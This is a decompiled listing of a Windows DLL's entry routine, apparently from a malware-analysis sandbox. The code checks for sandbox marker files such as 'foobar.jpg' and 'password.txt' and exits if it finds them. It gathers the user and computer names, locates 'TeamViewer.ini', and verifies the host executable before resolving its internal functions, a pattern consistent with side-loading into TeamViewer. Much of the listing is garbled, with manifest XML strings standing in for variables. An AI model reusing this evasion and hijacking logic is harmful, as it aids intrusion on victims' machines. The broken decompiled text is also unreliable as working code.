					_t268 = M6ECB0530; // 0xcb2c98
					__eflags = _t268;
					if(_t268 != 0) {
						HeapFree(GetProcessHeap(), 0, _t268);
					}
					_t269 = M6ECB0534; // 0xcc2700
					__eflags = _t269;
					if(_t269 != 0) {
						HeapFree(GetProcessHeap(), 0, _t269);
					}
					_t270 = M6ECB04F8; // 0xcd21b8
					__eflags = _t270;
					if(_t270 != 0) {
						HeapFree(GetProcessHeap(), 0, _t270);
					}
					_t271 = M6ECB0504; // 0xcd3fb0
					__eflags = _t271;
					if(_t271 != 0) {
						HeapFree(GetProcessHeap(), 0, _t271);
					}
					_t272 = M6ECB04F4; // 0xcbe878
					__eflags = _t272;
					if(_t272 != 0) {
						HeapFree(GetProcessHeap(), 0, _t272);
					}
					_t273 = M6ECB0500; // 0xcc63c8
					__eflags = _t273;
					if(_t273 != 0) {
						HeapFree(GetProcessHeap(), 0, _t273);
					}
					_t274 = M6ECB04CC; // 0xcb2da8
					__eflags = _t274;
					if(_t274 != 0) {
						HeapFree(GetProcessHeap(), 0, _t274);
					}
					_t275 = M6ECB04D0; // 0xcc4128
					__eflags = _t275;
					if(_t275 != 0) {
						HeapFree(GetProcessHeap(), 0, _t275);
					}
					__eflags = "\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x0
					if(__eflags != 0) {
						_t277 = M6ECB04A8; // 0x0
						__eflags = _t277;
						if(_t277 != 0) {
							FreeLibrary(_t277);
						}
						_t278 = M6ECB0490; // 0x0
						__eflags = _t278;
						if(_t278 != 0) {
							FreeLibrary(_t278);
						}
						_t279 = M6ECB0494; // 0x0
						__eflags = _t279;
						if(_t279 != 0) {
							FreeLibrary(_t279);
						}
						_t280 = M6ECB0498; // 0x0
						__eflags = _t280;
						if(_t280 != 0) {
							FreeLibrary(_t280);
						}
						_t281 = M6ECB049C; // 0x0
						__eflags = _t281;
						if(_t281 != 0) {
							FreeLibrary(_t281);
						}
						_t282 = M6ECB04A0; // 0x0
						__eflags = _t282;
						if(_t282 != 0) {
							FreeLibrary(_t282);
						}
						_t283 = M6ECB04A4; // 0x0
						__eflags = _t283;
						if(_t283 != 0) {
							FreeLibrary(_t283);
						}
						_t284 =  *0x6ecb047c; // 0x0
						__eflags = _t284;
						if(_t284 != 0) {
							HeapFree(GetProcessHeap(), 0, _t284);
						}
						_t285 = M6ECB04D4; // 0x0
						__eflags = _t285;
						if(_t285 != 0) {
							HeapFree(GetProcessHeap(), 0, _t285);
						}
						_t286 = M6ECB04DC; // 0x0
						__eflags = _t286;
						if(_t286 != 0) {
							HeapFree(GetProcessHeap(), 0, _t286);
						}
						_t287 = M6ECB04D8; // 0x0
						__eflags = _t287;
						if(_t287 != 0) {
							HeapFree(GetProcessHeap(), 0, _t287);
						}
						_t288 = M6ECB04F0; // 0x0
						__eflags = _t288;
						if(_t288 != 0) {
							LocalFree(_t288);
						}
						__eflags = M6ECB0614 - 2;
						if(M6ECB0614 == 2) {
							E6ECAB840(0);
						}
						__eflags = M6ECB0614; // 0x0
						if(__eflags > 0) {
							E6ECAB510();
						}
						_t589 = 0x6ecb046c;
						do {
							_t289 =  *_t589;
							__eflags = _t289;
							if(_t289 != 0) {
								CloseHandle(_t289);
							}
							_t589 =  &(_t589[1]);
							__eflags = _t589 - 0x6ecb0478;
						} while (_t589 < 0x6ecb0478);
						_t290 = M6ECB0510; // 0x0
						__eflags = _t290;
						if(_t290 != 0) {
							NtTerminateThread(_t290, 0);
							_t532 = M6ECB0510; // 0x0
							CloseHandle(_t532);
						}
					}
					goto L131;
				} else {
					if(_t262 != 1) {
						L131:
						return 1;
					} else {
						DisableThreadLibraryCalls(_a4);
						"<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = GetModuleHandleA(0);
						_v928 = 0;
						_t343 = HeapAlloc(GetProcessHeap(), 8, 0x105);
						"on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = _t343;
						if(GetSystemDirectoryA(_t343, 0x105) == 0) {
							ExitProcess(0);
						}
						_t493 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xcd1a50
						PathAddBackslashA(_t493); // executed
						_t347 = HeapAlloc(GetProcessHeap(), 8, 0x105);
						"     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = _t347;
						M6ECB052C = GetModuleFileNameA(_a4, _t347, 0x104);
						_t350 = HeapAlloc(GetProcessHeap(), 8, 0x105);
						_t494 = M6ECB052C; // 0x21
						M6ECB0524 = _t350;
						RtlMoveMemory(_t350, "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD", _t494);
						_t351 = M6ECB0524; // 0xcd1c70
						M6ECB0528 = E6ECAA360(_t351, 0, 0);
						PathRemoveFileSpecA("     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD");
						PathAddBackslashA("     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD");
						SetCurrentDirectoryA("     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"); // executed
						_t357 = E6ECAA360("     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD", 0, 0);
						_t602 =  &_v936 + 0x18;
						M6ECB0520 = _t357; // executed
						__imp__SHGetSpecialFolderPathA(0,  &_v276, 0, 0); // executed
						if(_t357 != 0) {
							PathAddBackslashA( &_v292);
							_v948 = 0x626f6f66;
							_v944 = 0x6a2e7261;
							_v940 = 0x6770;
							_v938 = 0;
							wsprintfA( &_v556, "%s%s",  &_v292,  &_v948);
							_t624 = _t602 + 0x10;
							_t480 = GetFileAttributesA( &_v548); // executed
							if(_t480 != 0xffffffff) {
								ExitProcess(0);
							}
							_v956 = 0x74646f2e;
							_v952 = 0;
							wsprintfA( &_v548, "%s%s%s",  &_v284,  &_v940,  &_v956);
							_t602 = _t624 + 0x14;
							_t484 = GetFileAttributesA( &_v540); // executed
							if(_t484 != 0xffffffff) {
								_v947 = 0x7472;
								_v945 = 0x66;
								wsprintfA( &_v540, "%s%s%s",  &_v276,  &_v932,  &_v948);
								_t602 = _t602 + 0x14;
								if(GetFileAttributesA( &_v532) != 0xffffffff) {
									_v844 = 0x73736170;
									_v840 = 0x64726f77;
									_v836 = 0x73;
									_v939 = 0x7874;
									_v937 = 0x74;
									wsprintfA( &_v532, "%s%s%s",  &_v268,  &_v844,  &_v940);
									_t602 = _t602 + 0x14;
									if(GetFileAttributesA( &_v524) == 0xffffffff) {
										goto L11;
									} else {
										ExitProcess(0);
									}
								}
							}
						}
						L11:
						_t359 = HeapAlloc(GetProcessHeap(), 8, 0x105);
						M6ECB0530 = _t359;
						_t360 = GetModuleFileNameA(0, _t359, 0x104);
						_t537 = M6ECB0530; // 0xcb2c98
						M6ECB0538 = _t360;
						M6ECB053C = PathFindFileNameA(_t537);
						_t362 = M6ECB0530; // 0xcb2c98
						_t363 = E6ECAA360(_t362, 0, 0);
						M6ECB0534 = _t363;
						L6ECAC2EE();
						 *0x6ecb0278 = 0x11c;
						L6ECAC34E();
						M6ECB0548 = E6ECA3280(0);
						_t365 = E6ECA3220(0);
						_t604 = _t602 + 0x14;
						M6ECB0544 = _t365;
						__imp__WTSGetActiveConsoleSessionId(0x6ecb0278, 0x6ecb0278, 0x11c);
						M6ECB04E8 = _t365;
						_t366 = "<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xf30000
						if( *_t366 != 0x5a4d) {
							goto L131;
						} else {
							_t592 =  *((intOrPtr*)(_t366 + 0x3c)) + _t366;
							if( *_t592 != 0x4550) {
								goto L131;
							} else {
								_v860 =  *((intOrPtr*)(_t592 + 0x58));
								_v976 =  *(_t592 + 8);
								_v844 = 0x104;
								_t369 = HeapAlloc(GetProcessHeap(), 8, 0x20a);
								M6ECB04F8 = _t369;
								if(_t369 != 0) {
									_t474 = GetUserNameW(_t369,  &_v844); // executed
									if(_t474 == 0) {
										_t475 = M6ECB04F8; // 0xcd21b8
										 *_t475 = 0;
									}
								}
								_v856 = 0x104;
								_t371 = HeapAlloc(GetProcessHeap(), 8, 0x20a);
								M6ECB0504 = _t371;
								if(_t371 != 0) {
									__imp__GetComputerNameExW(3, _t371,  &_v856); // executed
									_t371 = M6ECB0504; // 0xcd3fb0
									if(_t371 == 0) {
										 *_t371 = 0;
										_t371 = M6ECB0504; // 0xcd3fb0
									}
								}
								_t498 = M6ECB04F8; // 0xcd21b8
								if(_t498 != 0) {
									M6ECB04F4 = E6ECAA2F0(_t498, 0, 0);
									_t371 = M6ECB0504; // 0xcd3fb0
									_t604 = _t604 + 0xc;
								}
								if(_t371 != 0) {
									_t472 = E6ECAA2F0(_t371, 0, 0);
									_t604 = _t604 + 0xc;
									M6ECB0500 = _t472;
								}
								_t373 = HeapAlloc(GetProcessHeap(), 8, 0x105);
								M6ECB04CC = _t373;
								if(_t373 != 0) {
									wsprintfA(_t373, "%s%s%s", "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD", "TeamViewer", ".ini");
									_t567 = M6ECB04CC; // 0xcb2da8
									_t471 = E6ECAA360(_t567, 0, 0);
									_t604 = _t604 + 0x20;
									M6ECB04D0 = _t471;
								}
								if(_v860 == 0x435a88 || _v976 == 0x4b4ca51f) {
									_push( &M6ECB04F0);
									"\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = 1;
									M6ECB04AC = E6ECA3390();
									_t375 = E6ECA1D50(0x77d938, _t592);
									M6ECB0580 = _t375;
									M6ECB0518 = _t375;
									M6ECB054C = E6ECA1D50(0x7b16d4, _t592);
									M6ECB0570 = E6ECA1D50(0x7b7db0, _t592);
									M6ECB0550 = E6ECA1D50(0x7725be, _t592);
									M6ECB0554 = E6ECA1D50(0x7725bc, _t592);
									M6ECB0574 = E6ECA1D50(0x7b701c, _t592);
									M6ECB0578 = E6ECA1D50(0x7a2d08, _t592);
									M6ECB057C = E6ECA1D50(0x7b70d8, _t592);
									M6ECB0558 = E6ECA1D50(0x7a304c, _t592);
									M6ECB055C = E6ECA1D50(0x749a58, _t592);
									M6ECB0560 = E6ECA1D50(0x74b970, _t592);
									"voker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = E6ECA1D50(0x7b0408, _t592);
									M6ECB0568 = E6ECA1D50(0x77ec48, _t592);
									M6ECB056C = E6ECA1D50(0x74cddc, _t592);
									_t390 = E6ECAA2F0(E6ECA1D50(0x7b4550, _t592), 0, 0);
									M6ECB04DC = _t390;
									M6ECB04E0 = lstrlenA(_t390);
									M6ECB0584 = E6ECA1D50(0x77a5b8, _t592);
									M6ECB04D8 = E6ECAA2F0(E6ECA1D50(0x7ad0d4, _t592), 0, 0);
									M6ECB04D4 = E6ECAA2F0(E6ECA1D50(0x7adf00, _t592), 0, 0);
									M6ECB0588 = E6ECA1D50(0x772a50, _t592);
									 *0x6ecb047c = E6ECAA2F0(E6ECA1D50(0x772af0, _t592), 0, 0);
									_t400 = GetCommandLineA();
									_t499 =  &_v868;
									_v868 = 0;
									_t596 = E6ECAA3D0(_t400,  &_v868);
									_t609 = _t604 + 0xdc;
									if(_t596 != 0) {
										CharLowerA( *_t596);
										_t566 = _v868;
										if(_t566 > 1) {
											_t587 = 1;
											do {
												if(_t587 >= _t566 - 1) {
													L34:
													_t467 =  *((intOrPtr*)(_t596 + _t587 * 4));
													_t499 =  *_t467;
													__eflags = _t499 - 0x6b;
													if(_t499 != 0x6b) {
														L37:
														__eflags = _t499 - 0x66;
														if(_t499 == 0x66) {
															__eflags =  *(_t467 + 1);
															if( *(_t467 + 1) == 0) {
																M6ECB04B8 = 1;
															}
														}
													} else {
														__eflags =  *(_t467 + 1);
														if( *(_t467 + 1) != 0) {
															goto L37;
														} else {
															M6ECB04B4 = 1;
														}
													}
												} else {
													_t468 =  *((intOrPtr*)(_t596 + _t587 * 4));
													if( *_t468 != 0x77 ||  *((intOrPtr*)(_t468 + 1)) != 0) {
														goto L34;
													} else {
														_t499 =  *(_t596 + 4 + _t587 * 4);
														_t587 = _t587 + 1;
														_t469 = StrToIntA(_t499);
														_t566 = _v868;
														M6ECB0514 = _t469;
													}
												}
												_t587 = _t587 + 1;
											} while (_t587 < _t566);
										}
										LocalFree(_t596);
									}
									_push(8);
									_push(0x6ecb0398);
									L6ECAC2EE();
									E6ECA2140(_t499, "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD", 1);
									_t403 = M6ECB04F0; // 0x0
									_t500 = M6ECB0500; // 0xcc63c8
									_t540 = M6ECB04F4; // 0xcbe878
									_t404 = E6ECA3180(_t540, _t500, _t403);
									_t502 = M6ECB04F0; // 0x0
									_v972 = 0x6467;
									_v970 = 0;
									M6ECB04E4 = _t404 % 0x7fffffff;
